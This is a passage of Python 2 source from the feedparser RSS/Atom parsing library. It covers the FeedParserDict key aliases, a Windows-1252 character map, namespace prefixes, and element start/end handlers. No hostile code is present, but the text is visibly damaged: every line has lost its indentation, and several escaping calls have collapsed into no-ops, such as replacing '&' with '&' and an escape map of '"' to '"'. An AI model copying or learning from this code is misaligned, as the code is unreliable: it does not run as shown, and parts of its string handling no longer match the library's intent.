# chardet library auto-detects character encodings
# Download from http://chardet.feedparser.org/
#try:
# import chardet
#except ImportError:
chardet = None
# ---------- don't touch these ----------
class ThingsNobodyCaresAboutButMe(Exception): pass
class CharacterEncodingOverride(ThingsNobodyCaresAboutButMe): pass
class CharacterEncodingUnknown(ThingsNobodyCaresAboutButMe): pass
class NonXMLContentType(ThingsNobodyCaresAboutButMe): pass
class UndeclaredNamespace(Exception): pass
SUPPORTED_VERSIONS = {'': u'unknown',
'rss090': u'RSS 0.90',
'rss091n': u'RSS 0.91 (Netscape)',
'rss091u': u'RSS 0.91 (Userland)',
'rss092': u'RSS 0.92',
'rss093': u'RSS 0.93',
'rss094': u'RSS 0.94',
'rss20': u'RSS 2.0',
'rss10': u'RSS 1.0',
'rss': u'RSS (unknown version)',
'atom01': u'Atom 0.1',
'atom02': u'Atom 0.2',
'atom03': u'Atom 0.3',
'atom10': u'Atom 1.0',
'atom': u'Atom (unknown version)',
'cdf': u'CDF',
}
class FeedParserDict(dict):
keymap = {'channel': 'feed',
'items': 'entries',
'guid': 'id',
'date': 'updated',
'date_parsed': 'updated_parsed',
'description': ['summary', 'subtitle'],
'description_detail': ['summary_detail', 'subtitle_detail'],
'url': ['href'],
'modified': 'updated',
'modified_parsed': 'updated_parsed',
'issued': 'published',
'issued_parsed': 'published_parsed',
'copyright': 'rights',
'copyright_detail': 'rights_detail',
'tagline': 'subtitle',
'tagline_detail': 'subtitle_detail'}
def __getitem__(self, key):
if key == 'category':
try:
return dict.__getitem__(self, 'tags')[0]['term']
except IndexError:
raise KeyError, "object doesn't have key 'category'"
elif key == 'enclosures':
norel = lambda link: FeedParserDict([(name,value) for (name,value) in link.items() if name!='rel'])
return [norel(link) for link in dict.__getitem__(self, 'links') if link['rel']==u'enclosure']
elif key == 'license':
for link in dict.__getitem__(self, 'links'):
if link['rel']==u'license' and 'href' in link:
return link['href']
elif key == 'updated':
# Temporarily help developers out by keeping the old
# broken behavior that was reported in issue 310.
# This fix was proposed in issue 328.
if not dict.__contains__(self, 'updated') and \
dict.__contains__(self, 'published'):
warnings.warn("To avoid breaking existing software while "
"fixing issue 310, a temporary mapping has been created "
"from `updated` to `published` if `updated` doesn't "
"exist. This fallback will be removed in a future version "
"of feedparser.", DeprecationWarning)
return dict.__getitem__(self, 'published')
return dict.__getitem__(self, 'updated')
elif key == 'updated_parsed':
if not dict.__contains__(self, 'updated_parsed') and \
dict.__contains__(self, 'published_parsed'):
warnings.warn("To avoid breaking existing software while "
"fixing issue 310, a temporary mapping has been created "
"from `updated_parsed` to `published_parsed` if "
"`updated_parsed` doesn't exist. This fallback will be "
"removed in a future version of feedparser.",
DeprecationWarning)
return dict.__getitem__(self, 'published_parsed')
return dict.__getitem__(self, 'updated_parsed')
else:
realkey = self.keymap.get(key, key)
if isinstance(realkey, list):
for k in realkey:
if dict.__contains__(self, k):
return dict.__getitem__(self, k)
elif dict.__contains__(self, realkey):
return dict.__getitem__(self, realkey)
return dict.__getitem__(self, key)
def __contains__(self, key):
if key in ('updated', 'updated_parsed'):
# Temporarily help developers out by keeping the old
# broken behavior that was reported in issue 310.
# This fix was proposed in issue 328.
return dict.__contains__(self, key)
try:
self.__getitem__(key)
except KeyError:
return False
else:
return True
has_key = __contains__
def get(self, key, default=None):
try:
return self.__getitem__(key)
except KeyError:
return default
def __setitem__(self, key, value):
key = self.keymap.get(key, key)
if isinstance(key, list):
key = key[0]
return dict.__setitem__(self, key, value)
def setdefault(self, key, value):
if key not in self:
self[key] = value
return value
return self[key]
def __getattr__(self, key):
# __getattribute__() is called first; this will be called
# only if an attribute was not already found
try:
return self.__getitem__(key)
except KeyError:
raise AttributeError, "object has no attribute '%s'" % key
def __hash__(self):
return id(self)
_cp1252 = {
128: unichr(8364), # euro sign
130: unichr(8218), # single low-9 quotation mark
131: unichr( 402), # latin small letter f with hook
132: unichr(8222), # double low-9 quotation mark
133: unichr(8230), # horizontal ellipsis
134: unichr(8224), # dagger
135: unichr(8225), # double dagger
136: unichr( 710), # modifier letter circumflex accent
137: unichr(8240), # per mille sign
138: unichr( 352), # latin capital letter s with caron
139: unichr(8249), # single left-pointing angle quotation mark
140: unichr( 338), # latin capital ligature oe
142: unichr( 381), # latin capital letter z with caron
145: unichr(8216), # left single quotation mark
146: unichr(8217), # right single quotation mark
147: unichr(8220), # left double quotation mark
148: unichr(8221), # right double quotation mark
149: unichr(8226), # bullet
150: unichr(8211), # en dash
151: unichr(8212), # em dash
152: unichr( 732), # small tilde
153: unichr(8482), # trade mark sign
154: unichr( 353), # latin small letter s with caron
155: unichr(8250), # single right-pointing angle quotation mark
156: unichr( 339), # latin small ligature oe
158: unichr( 382), # latin small letter z with caron
159: unichr( 376), # latin capital letter y with diaeresis
}
_urifixer = re.compile('^([A-Za-z][A-Za-z0-9+-.]*://)(/*)(.*?)')
def _urljoin(base, uri):
uri = _urifixer.sub(r'\1\3', uri)
if not isinstance(uri, unicode):
uri = uri.decode('utf-8', 'ignore')
try:
uri = urlparse.urljoin(base, uri)
except ValueError:
uri = u''
if not isinstance(uri, unicode):
return uri.decode('utf-8', 'ignore')
return uri
class _FeedParserMixin:
namespaces = {
'': '',
'http://backend.userland.com/rss': '',
'http://blogs.law.harvard.edu/tech/rss': '',
'http://purl.org/rss/1.0/': '',
'http://my.netscape.com/rdf/simple/0.9/': '',
'http://example.com/newformat#': '',
'http://example.com/necho': '',
'http://purl.org/echo/': '',
'uri/of/echo/namespace#': '',
'http://purl.org/pie/': '',
'http://purl.org/atom/ns#': '',
'http://www.w3.org/2005/Atom': '',
'http://purl.org/rss/1.0/modules/rss091#': '',
'http://webns.net/mvcb/': 'admin',
'http://purl.org/rss/1.0/modules/aggregation/': 'ag',
'http://purl.org/rss/1.0/modules/annotate/': 'annotate',
'http://media.tangent.org/rss/1.0/': 'audio',
'http://backend.userland.com/blogChannelModule': 'blogChannel',
'http://web.resource.org/cc/': 'cc',
'http://backend.userland.com/creativeCommonsRssModule': 'creativeCommons',
'http://purl.org/rss/1.0/modules/company': 'co',
'http://purl.org/rss/1.0/modules/content/': 'content',
'http://my.theinfo.org/changed/1.0/rss/': 'cp',
'http://purl.org/dc/elements/1.1/': 'dc',
'http://purl.org/dc/terms/': 'dcterms',
'http://purl.org/rss/1.0/modules/email/': 'email',
'http://purl.org/rss/1.0/modules/event/': 'ev',
'http://rssnamespace.org/feedburner/ext/1.0': 'feedburner',
'http://freshmeat.net/rss/fm/': 'fm',
'http://xmlns.com/foaf/0.1/': 'foaf',
'http://www.w3.org/2003/01/geo/wgs84_pos#': 'geo',
'http://www.georss.org/georss': 'georss',
'http://www.opengis.net/gml': 'gml',
'http://postneo.com/icbm/': 'icbm',
'http://purl.org/rss/1.0/modules/image/': 'image',
'http://www.itunes.com/DTDs/PodCast-1.0.dtd': 'itunes',
'http://example.com/DTDs/PodCast-1.0.dtd': 'itunes',
'http://purl.org/rss/1.0/modules/link/': 'l',
'http://search.yahoo.com/mrss': 'media',
# Version 1.1.2 of the Media RSS spec added the trailing slash on the namespace
'http://search.yahoo.com/mrss/': 'media',
'http://madskills.com/public/xml/rss/module/pingback/': 'pingback',
'http://prismstandard.org/namespaces/1.2/basic/': 'prism',
'http://www.w3.org/1999/02/22-rdf-syntax-ns#': 'rdf',
'http://www.w3.org/2000/01/rdf-schema#': 'rdfs',
'http://purl.org/rss/1.0/modules/reference/': 'ref',
'http://purl.org/rss/1.0/modules/richequiv/': 'reqv',
'http://purl.org/rss/1.0/modules/search/': 'search',
'http://purl.org/rss/1.0/modules/slash/': 'slash',
'http://schemas.xmlsoap.org/soap/envelope/': 'soap',
'http://purl.org/rss/1.0/modules/servicestatus/': 'ss',
'http://hacks.benhammersley.com/rss/streaming/': 'str',
'http://purl.org/rss/1.0/modules/subscription/': 'sub',
'http://purl.org/rss/1.0/modules/syndication/': 'sy',
'http://schemas.pocketsoap.com/rss/myDescModule/': 'szf',
'http://purl.org/rss/1.0/modules/taxonomy/': 'taxo',
'http://purl.org/rss/1.0/modules/threading/': 'thr',
'http://purl.org/rss/1.0/modules/textinput/': 'ti',
'http://madskills.com/public/xml/rss/module/trackback/': 'trackback',
'http://wellformedweb.org/commentAPI/': 'wfw',
'http://purl.org/rss/1.0/modules/wiki/': 'wiki',
'http://www.w3.org/1999/xhtml': 'xhtml',
'http://www.w3.org/1999/xlink': 'xlink',
'http://www.w3.org/XML/1998/namespace': 'xml',
'http://podlove.org/simple-chapters': 'psc',
}
_matchnamespaces = {}
can_be_relative_uri = set(['link', 'id', 'wfw_comment', 'wfw_commentrss', 'docs', 'url', 'href', 'comments', 'icon', 'logo'])
can_contain_relative_uris = set(['content', 'title', 'summary', 'info', 'tagline', 'subtitle', 'copyright', 'rights', 'description'])
can_contain_dangerous_markup = set(['content', 'title', 'summary', 'info', 'tagline', 'subtitle', 'copyright', 'rights', 'description'])
html_types = [u'text/html', u'application/xhtml+xml']
def __init__(self, baseuri=None, baselang=None, encoding=u'utf-8'):
if not self._matchnamespaces:
for k, v in self.namespaces.items():
self._matchnamespaces[k.lower()] = v
self.feeddata = FeedParserDict() # feed-level data
self.encoding = encoding # character encoding
self.entries = [] # list of entry-level data
self.version = u'' # feed type/version, see SUPPORTED_VERSIONS
self.namespacesInUse = {} # dictionary of namespaces defined by the feed
# the following are used internally to track state;
# this is really out of control and should be refactored
self.infeed = 0
self.inentry = 0
self.incontent = 0
self.intextinput = 0
self.inimage = 0
self.inauthor = 0
self.incontributor = 0
self.inpublisher = 0
self.insource = 0
# georss
self.ingeometry = 0
self.sourcedata = FeedParserDict()
self.contentparams = FeedParserDict()
self._summaryKey = None
self.namespacemap = {}
self.elementstack = []
self.basestack = []
self.langstack = []
self.baseuri = baseuri or u''
self.lang = baselang or None
self.svgOK = 0
self.title_depth = -1
self.depth = 0
# psc_chapters_flag prevents multiple psc_chapters from being
# captured in a single entry or item. The transition states are
# None -> True -> False. psc_chapter elements will only be
# captured while it is True.
self.psc_chapters_flag = None
if baselang:
self.feeddata['language'] = baselang.replace('_','-')
# A map of the following form:
# {
# object_that_value_is_set_on: {
# property_name: depth_of_node_property_was_extracted_from,
# other_property: depth_of_node_property_was_extracted_from,
# },
# }
self.property_depth_map = {}
def _normalize_attributes(self, kv):
k = kv[0].lower()
v = k in ('rel', 'type') and kv[1].lower() or kv[1]
# the sgml parser doesn't handle entities in attributes, nor
# does it pass the attribute values through as unicode, while
# strict xml parsers do -- account for this difference
if isinstance(self, _LooseFeedParser):
v = v.replace('&', '&')
if not isinstance(v, unicode):
v = v.decode('utf-8')
return (k, v)
def unknown_starttag(self, tag, attrs):
# increment depth counter
self.depth += 1
# normalize attrs
attrs = map(self._normalize_attributes, attrs)
# track xml:base and xml:lang
attrsD = dict(attrs)
baseuri = attrsD.get('xml:base', attrsD.get('base')) or self.baseuri
if not isinstance(baseuri, unicode):
baseuri = baseuri.decode(self.encoding, 'ignore')
# ensure that self.baseuri is always an absolute URI that
# uses a whitelisted URI scheme (e.g. not `javscript:`)
if self.baseuri:
self.baseuri = _makeSafeAbsoluteURI(self.baseuri, baseuri) or self.baseuri
else:
self.baseuri = _urljoin(self.baseuri, baseuri)
lang = attrsD.get('xml:lang', attrsD.get('lang'))
if lang == '':
# xml:lang could be explicitly set to '', we need to capture that
lang = None
elif lang is None:
# if no xml:lang is specified, use parent lang
lang = self.lang
if lang:
if tag in ('feed', 'rss', 'rdf:RDF'):
self.feeddata['language'] = lang.replace('_','-')
self.lang = lang
self.basestack.append(self.baseuri)
self.langstack.append(lang)
# track namespaces
for prefix, uri in attrs:
if prefix.startswith('xmlns:'):
self.trackNamespace(prefix[6:], uri)
elif prefix == 'xmlns':
self.trackNamespace(None, uri)
# track inline content
if self.incontent and not self.contentparams.get('type', u'xml').endswith(u'xml'):
if tag in ('xhtml:div', 'div'):
return # typepad does this 10/2007
# element declared itself as escaped markup, but it isn't really
self.contentparams['type'] = u'application/xhtml+xml'
if self.incontent and self.contentparams.get('type') == u'application/xhtml+xml':
if tag.find(':') <> -1:
prefix, tag = tag.split(':', 1)
namespace = self.namespacesInUse.get(prefix, '')
if tag=='math' and namespace=='http://www.w3.org/1998/Math/MathML':
attrs.append(('xmlns',namespace))
if tag=='svg' and namespace=='http://www.w3.org/2000/svg':
attrs.append(('xmlns',namespace))
if tag == 'svg':
self.svgOK += 1
return self.handle_data('<%s%s>' % (tag, self.strattrs(attrs)), escape=0)
# match namespaces
if tag.find(':') <> -1:
prefix, suffix = tag.split(':', 1)
else:
prefix, suffix = '', tag
prefix = self.namespacemap.get(prefix, prefix)
if prefix:
prefix = prefix + '_'
# special hack for better tracking of empty textinput/image elements in illformed feeds
if (not prefix) and tag not in ('title', 'link', 'description', 'name'):
self.intextinput = 0
if (not prefix) and tag not in ('title', 'link', 'description', 'url', 'href', 'width', 'height'):
self.inimage = 0
# call special handler (if defined) or default handler
methodname = '_start_' + prefix + suffix
try:
method = getattr(self, methodname)
return method(attrsD)
except AttributeError:
# Since there's no handler or something has gone wrong we explicitly add the element and its attributes
unknown_tag = prefix + suffix
if len(attrsD) == 0:
# No attributes so merge it into the encosing dictionary
return self.push(unknown_tag, 1)
else:
# Has attributes so create it in its own dictionary
context = self._getContext()
context[unknown_tag] = attrsD
def unknown_endtag(self, tag):
# match namespaces
if tag.find(':') <> -1:
prefix, suffix = tag.split(':', 1)
else:
prefix, suffix = '', tag
prefix = self.namespacemap.get(prefix, prefix)
if prefix:
prefix = prefix + '_'
if suffix == 'svg' and self.svgOK:
self.svgOK -= 1
# call special handler (if defined) or default handler
methodname = '_end_' + prefix + suffix
try:
if self.svgOK:
raise AttributeError()
method = getattr(self, methodname)
method()
except AttributeError:
self.pop(prefix + suffix)
# track inline content
if self.incontent and not self.contentparams.get('type', u'xml').endswith(u'xml'):
# element declared itself as escaped markup, but it isn't really
if tag in ('xhtml:div', 'div'):
return # typepad does this 10/2007
self.contentparams['type'] = u'application/xhtml+xml'
if self.incontent and self.contentparams.get('type') == u'application/xhtml+xml':
tag = tag.split(':')[-1]
self.handle_data('</%s>' % tag, escape=0)
# track xml:base and xml:lang going out of scope
if self.basestack:
self.basestack.pop()
if self.basestack and self.basestack[-1]:
self.baseuri = self.basestack[-1]
if self.langstack:
self.langstack.pop()
if self.langstack: # and (self.langstack[-1] is not None):
self.lang = self.langstack[-1]
self.depth -= 1
def handle_charref(self, ref):
# called for each character reference, e.g. for ' ', ref will be '160'
if not self.elementstack:
return
ref = ref.lower()
if ref in ('34', '38', '39', '60', '62', 'x22', 'x26', 'x27', 'x3c', 'x3e'):
text = '&#%s;' % ref
else:
if ref[0] == 'x':
c = int(ref[1:], 16)
else:
c = int(ref)
text = unichr(c).encode('utf-8')
self.elementstack[-1][2].append(text)
def handle_entityref(self, ref):
# called for each entity reference, e.g. for '©', ref will be 'copy'
if not self.elementstack:
return
if ref in ('lt', 'gt', 'quot', 'amp', 'apos'):
text = '&%s;' % ref
elif ref in self.entities:
text = self.entities[ref]
if text.startswith('&#') and text.endswith(';'):
return self.handle_entityref(text)
else:
try:
name2codepoint[ref]
except KeyError:
text = '&%s;' % ref
else:
text = unichr(name2codepoint[ref]).encode('utf-8')
self.elementstack[-1][2].append(text)
def handle_data(self, text, escape=1):
# called for each block of plain text, i.e. outside of any tag and
# not containing any character or entity references
if not self.elementstack:
return
if escape and self.contentparams.get('type') == u'application/xhtml+xml':
text = _xmlescape(text)
self.elementstack[-1][2].append(text)
def handle_comment(self, text):
# called for each comment, e.g. <!-- insert message here -->
pass
def handle_pi(self, text):
# called for each processing instruction, e.g. <?instruction>
pass
def handle_decl(self, text):
pass
def parse_declaration(self, i):
# override internal declaration handler to handle CDATA blocks
if self.rawdata[i:i+9] == '<![CDATA[':
k = self.rawdata.find(']]>', i)
if k == -1:
# CDATA block began but didn't finish
k = len(self.rawdata)
return k
self.handle_data(_xmlescape(self.rawdata[i+9:k]), 0)
return k+3
else:
k = self.rawdata.find('>', i)
if k >= 0:
return k+1
else:
# We have an incomplete CDATA block.
return k
def mapContentType(self, contentType):
contentType = contentType.lower()
if contentType == 'text' or contentType == 'plain':
contentType = u'text/plain'
elif contentType == 'html':
contentType = u'text/html'
elif contentType == 'xhtml':
contentType = u'application/xhtml+xml'
return contentType
def trackNamespace(self, prefix, uri):
loweruri = uri.lower()
if not self.version:
if (prefix, loweruri) == (None, 'http://my.netscape.com/rdf/simple/0.9/'):
self.version = u'rss090'
elif loweruri == 'http://purl.org/rss/1.0/':
self.version = u'rss10'
elif loweruri == 'http://www.w3.org/2005/atom':
self.version = u'atom10'
if loweruri.find(u'backend.userland.com/rss') <> -1:
# match any backend.userland.com namespace
uri = u'http://backend.userland.com/rss'
loweruri = uri
if loweruri in self._matchnamespaces:
self.namespacemap[prefix] = self._matchnamespaces[loweruri]
self.namespacesInUse[self._matchnamespaces[loweruri]] = uri
else:
self.namespacesInUse[prefix or ''] = uri
def resolveURI(self, uri):
return _urljoin(self.baseuri or u'', uri)
def decodeEntities(self, element, data):
return data
def strattrs(self, attrs):
return ''.join([' %s="%s"' % (t[0],_xmlescape(t[1],{'"':'"'})) for t in attrs])
def push(self, element, expectingText):
self.elementstack.append([element, expectingText, []])
def pop(self, element, stripWhitespace=1):
if not self.elementstack:
return
if self.elementstack[-1][0] != element:
return
element, expectingText, pieces = self.elementstack.pop()
if self.version == u'atom10' and self.contentparams.get('type', u'text') == u'application/xhtml+xml':
# remove enclosing child element, but only if it is a <div> and
# only if all the remaining content is nested underneath it.
# This means that the divs would be retained in the following:
# <div>foo</div><div>bar</div>
while pieces and len(pieces)>1 and not pieces[-1].strip():
del pieces[-1]
while pieces and len(pieces)>1 and not pieces[0].strip():
del pieces[0]
if pieces and (pieces[0] == '<div>' or pieces[0].startswith('<div ')) and pieces[-1]=='</div>':
depth = 0
for piece in pieces[:-1]:
if piece.startswith('</'):
depth -= 1
if depth == 0:
break
elif piece.startswith('<') and not piece.endswith('/>'):
depth += 1
else:
pieces = pieces[1:-1]
# Ensure each piece is a str for Python 3
for (i, v) in enumerate(pieces):
if not isinstance(v, unicode):
pieces[i] = v.decode('utf-8')
output = u''.join(pieces)
if stripWhitespace:
output = output.strip()
if not expectingText:
return output
# decode base64 content
if base64 and self.contentparams.get('base64', 0):
try:
output = _base64decode(output)
except binascii.Error:
pass
except binascii.Incomplete:
pass
except TypeError:
# In Python 3, base64 takes and outputs bytes, not str
# This may not be the most correct way to accomplish this
output = _base64decode(output.encode('utf-8')).decode('utf-8')
# resolve relative URIs
if (element in self.can_be_relative_uri) and output:
# do not resolve guid elements with isPermalink="false"
if not element == 'id' or self.guidislink:
output = self.resolveURI(output)
# decode entities within embedded markup
if not self.contentparams.get('base64', 0):
output = self.decodeEntities(element, output)
# some feed formats require consumers to guess
# whether the content is html or plain text
if not self.version.startswith(u'atom') and self.contentparams.get('type') == u'text/plain':
if self.lookslikehtml(output):
self.contentparams['type'] = u'text/html'
# remove temporary cruft from contentparams
try:
del self.contentparams['mode']
except KeyError:
pass
try:
del self.contentparams['base64']
except KeyError:
pass
is_htmlish = self.mapContentType(self.contentparams.get('type', u'text/html')) in self.html_types
# resolve relative URIs within embedded markup
if is_htmlish and RESOLVE_RELATIVE_URIS:
if element in self.can_contain_relative_uris:
output = _resolveRelativeURIs(output, self.baseuri, self.encoding, self.contentparams.get('type', u'text/html'))
# sanitize embedded markup
if is_htmlish and SANITIZE_HTML:
if element in self.can_contain_dangerous_markup:
output = _sanitizeHTML(output, self.encoding, self.contentparams.get('type', u'text/html'))
if self.encoding and not isinstance(output, unicode):
output = output.decode(self.encoding, 'ignore')
# address common error where people take data that is already
# utf-8, presume that it is iso-8859-1, and re-encode it.
if self.encoding in (u'utf-8', u'utf-8_INVALID_PYTHON_3') and isinstance(output, unicode):
try:
output = output.encode('iso-8859-1').decode('utf-8')
except (UnicodeEncodeError, UnicodeDecodeError):
pass
# map win-1252 extensions to the proper code points
if isinstance(output, unicode):
output = output.translate(_cp1252)
# categories/tags/keywords/whatever are handled in _end_category
if element == 'category':
return output
if element == 'title' and -1 < self.title_depth <= self.depth:
return output
# store output in appropriate place(s)
if self.inentry and not self.insource:
if element == 'content':
self.entries[-1].setdefault(element, [])
contentparams = copy.deepcopy(self.contentparams)
contentparams['value'] = output
self.entries[-1][element].append(contentparams)
elif element == 'link':
if not self.inimage:
# query variables in urls in link elements are improperly
# converted from `?a=1&b=2` to `?a=1&b;=2` as if they're
# unhandled character references. fix this special case.
output = re.sub("&([A-Za-z0-9_]+);", "&\g<1>", output)
self.entries[-1][element] = output
if output:
self.entries[-1]['links'][-1]['href'] = output
else:
if element == 'description':
element = 'summary'
old_value_depth = self.property_depth_map.setdefault(self.entries[-1], {}).get(element)
if old_value_depth is None or self.depth <= old_value_depth:
self.property_depth_map[self.entries[-1]][element] = self.depth
self.entries[-1][element] = output
if self.incontent:
contentparams = copy.deepcopy(self.contentparams)
contentparams['value'] = output
self.entries[-1][element + '_detail'] = contentparams
elif (self.infeed or self.insource):# and (not self.intextinput) and (not self.inimage):
context = self._getContext()
if element == 'description':
element = 'subtitle'
context[element] = output
if element == 'link':
# fix query variables; see above for the explanation
output = re.sub("&([A-Za-z0-9_]+);", "&\g<1>", output)
context[element] = output
context['links'][-1]['href'] = output
elif self.incontent:
contentparams = copy.deepcopy(self.contentparams)
contentparams['value'] = output
context[element + '_detail'] = contentparams
return output
def pushContent(self, tag, attrsD, defaultContentType, expectingText):
self.incontent += 1
if self.lang:
self.lang=self.lang.replace('_','-')
self.contentparams = FeedParserDict({
'type': self.mapContentType(attrsD.get('type', defaultContentType)),
'language': self.lang,
'base': self.baseuri})
self.contentparams['base64'] = self._isBase64(attrsD, self.contentparams)
self.push(tag, expectingText)
def popContent(self, tag):
value = self.pop(tag)
self.incontent -= 1
self.contentparams.clear()
return value
# a number of elements in a number of RSS variants are nominally plain
# text, but this is routinely ignored. This is an attempt to detect
# the most common cases. As false positives often result in silent
# data loss, this function errs on the conservative side.
@staticmethod
def lookslikehtml(s):
# must have a close tag or an entity reference to qualify
if not (re.search(r'</(\w+)>',s) or re.search("&#?\w+;",s)):
return
# all tags must be in a restricted subset of valid HTML tags
if filter(lambda t: t.lower() not in _HTMLSanitizer.acceptable_elements,
re.findall(r'</?(\w+)',s)):
return
# all entities must have been defined as valid HTML entities
if filter(lambda e: e not in entitydefs.keys(), re.findall(r'&(\w+);', s)):
return
return 1
def _mapToStandardPrefix(self, name):
colonpos = name.find(':')
if colonpos <> -1:
prefix = name[:colonpos]
suffix = name[colonpos+1:]
prefix = self.namespacemap.get(prefix, prefix)
name = prefix + ':' + suffix
return name
def _getAttribute(self, attrsD, name):
return attrsD.get(self._mapToStandardPrefix(name))
def _isBase64(self, attrsD, contentparams):
if attrsD.get('mode', '') == 'base64':
return 1
if self.contentparams['type'].startswith(u'text/'):
return 0
if self.contentparams['type'].endswith(u'+xml'):
return 0
if self.contentparams['type'].endswith(u'/xml'):
return 0
return 1
def _itsAnHrefDamnIt(self, attrsD):
href = attrsD.get('url', attrsD.get('uri', attrsD.get('href', None)))
if href:
try:
del attrsD['url']
except KeyError:
pass
try:
del attrsD['uri']
except KeyError:
pass
attrsD['href'] = href
return attrsD
def _save(self, key, value, overwrite=False):
context = self._getContext()
if overwrite:
context[key] = value
else:
context.setdefault(key, value)
def _start_rss(self, attrsD):
versionmap = {'0.91': u'rss091u',
'0.92': u'rss092',
'0.93': u'rss093',
'0.94': u'rss094'}
#If we're here then this is an RSS feed.
#If we don't have a version or have a version that starts with something
#other than RSS then there's been a mistake. Correct it.
if not self.version or not self.version.startswith(u'rss'):
attr_version = attrsD.get('version', '')
version = versionmap.get(attr_version)
if version:
self.version = version
elif attr_version.startswith('2.'):
self.version = u'rss20'
else:
self.version = u'rss'
def _start_channel(self, attrsD):
self.infeed = 1
self._cdf_common(attrsD)
def _cdf_common(self, attrsD):
if 'lastmod' in attrsD:
self._start_modified({})
self.elementstack[-1][-1] = attrsD['lastmod']
self._end_modified()
if 'href' in attrsD:
self._start_link({})
self.elementstack[-1][-1] = attrsD['href']
self._end_link()
def _start_feed(self, attrsD):
self.infeed = 1
versionmap = {'0.1': u'atom01',
'0.2': u'atom02',
'0.3': u'atom03'}
if not self.version:
attr_version = attrsD.get('version')
version = versionmap.get(attr_version)
if version:
self.version = version
else:
self.version = u'atom'
def _end_channel(self):
self.infeed = 0
_end_feed = _end_channel
def _start_image(self, attrsD):
context = self._getContext()
if not self.inentry:
context.setdefault('image', FeedParserDict())
self.inimage = 1
self.title_depth = -1
self.push('image', 0)
def _end_image(self):
self.pop('image')
self.inimage = 0
def _start_textinput(self, attrsD):
context = self._getContext()
context.setdefault('textinput', FeedParserDict())
self.intextinput = 1
self.title_depth = -1
self.push('textinput', 0)
_start_textInput = _start_textinput
def _end_textinput(self):
self.pop('textinput')
self.intextinput = 0
_end_textInput = _end_textinput
def _start_author(self, attrsD):
self.inauthor = 1
self.push('author', 1)
# Append a new FeedParserDict when expecting an author
context = self._getContext()
context.setdefault('authors', [])
context['authors'].append(FeedParserDict())
_start_managingeditor = _start_author
_start_dc_author = _start_author
_start_dc_creator = _start_author
_start_itunes_author = _start_author
def _end_author(self):
self.pop('author')
self.inauthor = 0
self._sync_author_detail()
_end_managingeditor = _end_author
_end_dc_author = _end_author
_end_dc_creator = _end_author
_end_itunes_author = _end_author
def _start_itunes_owner(self, attrsD):
self.inpublisher = 1
self.push('publisher', 0)
def _end_itunes_owner(self):
self.pop('publisher')
self.inpublisher = 0
self._sync_author_detail('publisher')
def _start_contributor(self, attrsD):
self.incontributor = 1
context = self._getContext()
context.setdefault('contributors', [])
context['contributors'].append(FeedParserDict())
self.push('contributor', 0)
def _end_contributor(self):
self.pop('contributor')
self.incontributor = 0
def _start_dc_contributor(self, attrsD):
self.incontributor = 1
context = self._getContext()
context.setdefault('contributors', [])
context['contributors'].append(FeedParserDict())
self.push('name', 0)
def _end_dc_contributor(self):
self._end_name()
self.incontributor = 0
def _start_name(self, attrsD):
self.push('name', 0)
_start_itunes_name = _start_name
def _end_name(self):
value = self.pop('name')
if self.inpublisher:
self._save_author('name', value, 'publisher')
elif self.inauthor:
self._save_author('name', value)
elif self.incontributor:
self._save_contributor('name', value)
elif self.intextinput:
context = self._getContext()
context['name'] = value
_end_itunes_name = _end_name
def _start_width(self, attrsD):
self.push('width', 0)
def _end_width(self):
value = self.pop('width')
try:
value = int(value)
except ValueError:
value = 0
if self.inimage:
context = self._getContext()
context['width'] = value
def _start_height(self, attrsD):
self.push('height', 0)
def _end_height(self):
value = self.pop('height')
try:
value = int(value)
except ValueError:
value = 0
if self.inimage:
context = self._getContext()
context['height'] = value
def _start_url(self, attrsD):
self.push('href', 1)
_start_homepage = _start_url
_start_uri = _start_url
def _end_url(self):
value = self.pop('href')
if self.inauthor:
self._save_author('href', value)
elif self.incontributor:
self._save_contributor('href', value)
_end_homepage = _end_url
_end_uri = _end_url
def _start_email(self, attrsD):
self.push('email', 0)
_start_itunes_email = _start_email
def _end_email(self):
value = self.pop('email')
if self.inpublisher:
self._save_author('email', value, 'publisher')
elif self.inauthor:
self._save_author('email', value)
elif self.incontributor:
self._save_contributor('email', value)
_end_itunes_email = _end_email
def _getContext(self):
if self.insource:
context = self.sourcedata
elif self.inimage and 'image' in self.feeddata:
context = self.feeddata['image']
elif self.intextinput:
context = self.feeddata['textinput']
elif self.inentry:
context = self.entries[-1]
else:
context = self.feeddata
return context
def _save_author(self, key, value, prefix='author'):
context = self._getContext()
context.setdefault(prefix + '_detail', FeedParserDict())
context[prefix + '_detail'][key] = value
self._sync_author_detail()
context.setdefault('authors', [FeedParserDict()])
context['authors'][-1][key] = value
def _save_contributor(self, key, value):
context = self._getContext()
context.setdefault('contributors', [FeedParserDict()])
context['contributors'][-1][key] = value
def _sync_author_detail(self, key='author'):
context = self._getContext()
detail = context.get('%s_detail' % key)
if detail:
name = detail.get('name')
email = detail.get('email')
if name and email:
context[key] = u'%s (%s)' % (name, email)
elif name:
context[key] = name
elif email:
context[key] = email
else:
author, email = context.get(key), None
if not author:
return
emailmatch = re.search(ur'''(([a-zA-Z0-9\_\-\.\+]+)@((\[[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.)|(([a-zA-Z0-9\-]+\.)+))([a-zA-Z]{2,4}|[0-9]{1,3})(\]?))(\?subject=\S+)?''', author)
if emailmatch:
email = emailmatch.group(0)
# probably a better way to do the following, but it passes all the tests
author = author.replace(email, u'')
author = author.replace(u'()', u'')
author = author.replace(u'<>', u'')
author = author.replace(u'<>', u'')
author = author.strip()
if author and (author[0] == u'('):
author = author[1:]
if author and (author[-1] == u')'):
author = author[:-1]
author = author.strip()
if author or email:
context.setdefault('%s_detail' % key, FeedParserDict())
if author:
context['%s_detail' % key]['name'] = author
if email:
context['%s_detail' % key]['email'] = email
def _start_subtitle(self, attrsD):
self.pushContent('subtitle', attrsD, u'text/plain', 1)
_start_tagline = _start_subtitle
_start_itunes_subtitle = _start_subtitle
def _end_subtitle(self):
self.popContent('subtitle')
_end_tagline = _end_subtitle
_end_itunes_subtitle = _end_subtitle
def _start_rights(self, attrsD):
self.pushContent('rights', attrsD, u'text/plain', 1)
_start_dc_rights = _start_rights
_start_copyright = _start_rights
def _end_rights(self):
self.popContent('rights')
_end_dc_rights = _end_rights
_end_copyright = _end_rights
def _start_item(self, attrsD):
self.entries.append(FeedParserDict())
self.push('item', 0)
self.inentry = 1
self.guidislink = 0
self.title_depth = -1
self.psc_chapters_flag = None
id = self._getAttribute(attrsD, 'rdf:about')
if id:
context = self._getContext()
context['id'] = id
self._cdf_common(attrsD)
_start_entry = _start_item
def _end_item(self):
self.pop('item')
self.inentry = 0
_end_entry = _end_item
